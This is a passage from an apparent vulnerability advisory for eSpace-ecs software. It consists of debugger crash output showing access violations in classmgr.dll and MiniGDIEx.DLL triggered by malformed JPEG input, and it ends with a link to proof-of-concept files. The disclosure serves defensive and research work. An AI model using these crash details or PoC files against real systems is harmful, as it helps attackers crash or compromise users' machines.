passed to C runtime function. (1874.2274): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=015d8998 edx=00000000 esi=015d8ab8 edi=00000000 eip=025f1b99 esp=032ccc88 ebp=032cd0c4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\classmgr.dll - classmgr+0x11b99: 025f1b99 8b9868060000 mov ebx,dword ptr [eax+668h] ds:0023:00000668=???????? -- JPEG datastream contains no image Improper call to JPEG library in state 200 (1f88.2768): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=a2afcfb5 edx=00000000 esi=0352e318 edi=000000cc eip=0491b035 esp=0352e2c8 ebp=0352ed30 iopl=0 nv up ei ng nz ac pe cy cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297 *** WARNING: Unable to verify checksum for C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.DLL *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\eSpace-ecs\conf\cwbin\MiniGDIEx.DLL - MiniGDIEx!DllUnregisterServer+0x2f95: 0491b035 ff10 call dword ptr [eax] ds:0023:00000000=???????? --- PoC files: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46867.zip